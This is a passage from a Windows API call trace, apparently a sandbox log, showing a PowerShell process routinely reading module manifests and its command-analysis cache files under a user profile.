"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_bb0bf3e8-6bf6-4825-9576-5c9ab6654eb2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xab8 [0282.679] GetFileType (hFile=0xab8) returned 0x1 [0282.679] GetFileType (hFile=0xab8) returned 0x1 [0282.679] ReadFile (in: hFile=0xab8, lpBuffer=0x25b5c866590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c866590*, lpNumberOfBytesRead=0x653ef8d338*=0x84c, lpOverlapped=0x0) returned 1 [0282.681] ReadFile (in: hFile=0xab8, lpBuffer=0x25b5c866590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c866590*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.681] CloseHandle (hObject=0xab8) returned 1 [0282.681] ReleaseMutex (hMutex=0xab4) returned 1 [0282.681] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0282.681] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cffae0 [0282.681] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cffae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.681] CoTaskMemFree (pv=0x25b73cffae0) [0282.681] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfa3c0 [0282.681] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfa3c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.681] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.681] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.682] GetCurrentProcess () returned 0xffffffffffffffff [0282.682] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xab8) returned 1 [0282.682] GetTokenInformation (in: TokenHandle=0xab8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.682] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984ef0 [0282.682] GetTokenInformation (in: TokenHandle=0xab8, TokenInformationClass=0x1, TokenInformation=0x25b73984ef0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984ef0, ReturnLength=0x653ef8d6b8) returned 1 [0282.682] LocalFree (hMem=0x25b73984ef0) returned 0x0 [0282.682] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c86b720, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c86b720*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.682] CreateMutexW (lpMutexAttributes=0x25b5c86b870, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xabc [0282.682] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xabc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.683] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.683] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.683] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.683] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0282.683] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c86bec0 | out: lpFileInformation=0x25b5c86bec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a75f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x63a75f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x63a75f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0282.683] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.683] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_68d3d05d-3fd6-414a-81ed-bbde5d989a56", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_68d3d05d-3fd6-414a-81ed-bbde5d989a56", lpFilePart=0x0) returned 0x93 [0282.684] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_68d3d05d-3fd6-414a-81ed-bbde5d989a56" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_68d3d05d-3fd6-414a-81ed-bbde5d989a56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xac0 [0282.685] GetFileType (hFile=0xac0) returned 0x1 [0282.685] GetFileType (hFile=0xac0) returned 0x1 [0282.685] ReadFile (in: hFile=0xac0, lpBuffer=0x25b5c86d150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c86d150*, lpNumberOfBytesRead=0x653ef8d338*=0x31e, lpOverlapped=0x0) returned 1 [0282.687] ReadFile (in: hFile=0xac0, lpBuffer=0x25b5c86d150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c86d150*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.687] CloseHandle (hObject=0xac0) returned 1 [0282.687] ReleaseMutex (hMutex=0xabc) returned 1 [0282.688] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0282.688] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.688] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.688] CoTaskMemFree (pv=0x25b73d00e00) [0282.688] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0282.688] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.688] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.688] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.689] GetCurrentProcess () returned 0xffffffffffffffff [0282.689] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xac0) returned 1 [0282.689] GetTokenInformation (in: TokenHandle=0xac0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.689] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739848f0 [0282.689] GetTokenInformation (in: TokenHandle=0xac0, TokenInformationClass=0x1, TokenInformation=0x25b739848f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739848f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.689] LocalFree (hMem=0x25b739848f0) returned 0x0 [0282.689] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c8711a0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c8711a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.690] CreateMutexW (lpMutexAttributes=0x25b5c8712f0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xac4 [0282.690] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xac4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.690] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.690] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.690] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0282.690] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c871960 | out: lpFileInformation=0x25b5c871960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f22c8c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62f22c8c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62f22c8c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0282.691] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.692] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_598526ee-1366-4471-bf5a-e4b7c958601a", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_598526ee-1366-4471-bf5a-e4b7c958601a", lpFilePart=0x0) returned 0x93 [0282.692] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_598526ee-1366-4471-bf5a-e4b7c958601a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_598526ee-1366-4471-bf5a-e4b7c958601a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xac8 [0282.692] GetFileType (hFile=0xac8) returned 0x1 [0282.692] GetFileType (hFile=0xac8) returned 0x1 [0282.692] ReadFile (in: hFile=0xac8, lpBuffer=0x25b5c872c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c872c18*, lpNumberOfBytesRead=0x653ef8d338*=0x252, lpOverlapped=0x0) returned 1 [0282.694] ReadFile (in: hFile=0xac8, lpBuffer=0x25b5c872c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c872c18*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.695] CloseHandle (hObject=0xac8) returned 1 [0282.695] ReleaseMutex (hMutex=0xac4) returned 1 [0282.695] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0282.695] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.695] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.695] CoTaskMemFree (pv=0x25b73d00e00) [0282.695] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.695] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.695] CoTaskMemFree (pv=0x25b73d007a0) [0282.695] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.695] GetCurrentProcess () returned 0xffffffffffffffff [0282.696] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xac8) returned 1 [0282.696] GetTokenInformation (in: TokenHandle=0xac8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.696] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739843f0 [0282.696] GetTokenInformation (in: TokenHandle=0xac8, TokenInformationClass=0x1, TokenInformation=0x25b739843f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739843f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.696] LocalFree (hMem=0x25b739843f0) returned 0x0 [0282.696] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c876a40, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c876a40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.697] CreateMutexW (lpMutexAttributes=0x25b5c876b90, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xacc [0282.697] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xacc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.699] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff8c0 [0282.699] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff8c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.699] CoTaskMemFree (pv=0x25b73cff8c0) [0282.700] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0282.700] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c8771f0 | out: lpFileInformation=0x25b5c8771f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c4c87b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c4c87b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c4c87b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a)) returned 1 [0282.700] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.700] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.706] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d02120 [0282.706] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d02120, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.707] CoTaskMemFree (pv=0x25b73d02120) [0282.707] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfc7e0 [0282.707] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfc7e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.707] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.707] GetCurrentProcess () returned 0xffffffffffffffff [0282.707] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xad0) returned 1 [0282.707] GetTokenInformation (in: TokenHandle=0xad0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.707] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739841b0 [0282.707] GetTokenInformation (in: TokenHandle=0xad0, TokenInformationClass=0x1, TokenInformation=0x25b739841b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739841b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.708] LocalFree (hMem=0x25b739841b0) returned 0x0 [0282.708] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c87e018, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c87e018*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.709] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xad4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.709] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0282.709] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.709] CoTaskMemFree (pv=0x25b73cfac40) [0282.715] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0282.715] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.715] CoTaskMemFree (pv=0x25b73cfee20) [0282.715] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.715] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.715] CoTaskMemFree (pv=0x25b73d007a0) [0282.715] GetCurrentProcess () returned 0xffffffffffffffff [0282.715] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xad8) returned 1 [0282.715] GetTokenInformation (in: TokenHandle=0xad8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.715] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984bb0 [0282.715] GetTokenInformation (in: TokenHandle=0xad8, TokenInformationClass=0x1, TokenInformation=0x25b73984bb0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984bb0, ReturnLength=0x653ef8d6b8) returned 1 [0282.716] LocalFree (hMem=0x25b73984bb0) returned 0x0 [0282.716] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c883d50, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c883d50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.716] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xadc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.717] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.717] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.717] CoTaskMemFree (pv=0x25b73d01680) [0282.721] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0282.722] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.722] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.722] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0282.722] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.722] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.722] GetCurrentProcess () returned 0xffffffffffffffff [0282.722] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xae0) returned 1 [0282.722] GetTokenInformation (in: TokenHandle=0xae0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.722] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984370 [0282.722] GetTokenInformation (in: TokenHandle=0xae0, TokenInformationClass=0x1, TokenInformation=0x25b73984370, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984370, ReturnLength=0x653ef8d6b8) returned 1 [0282.723] LocalFree (hMem=0x25b73984370) returned 0x0 [0282.724] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c88eec8, cbSid=0x653ef8d6b0 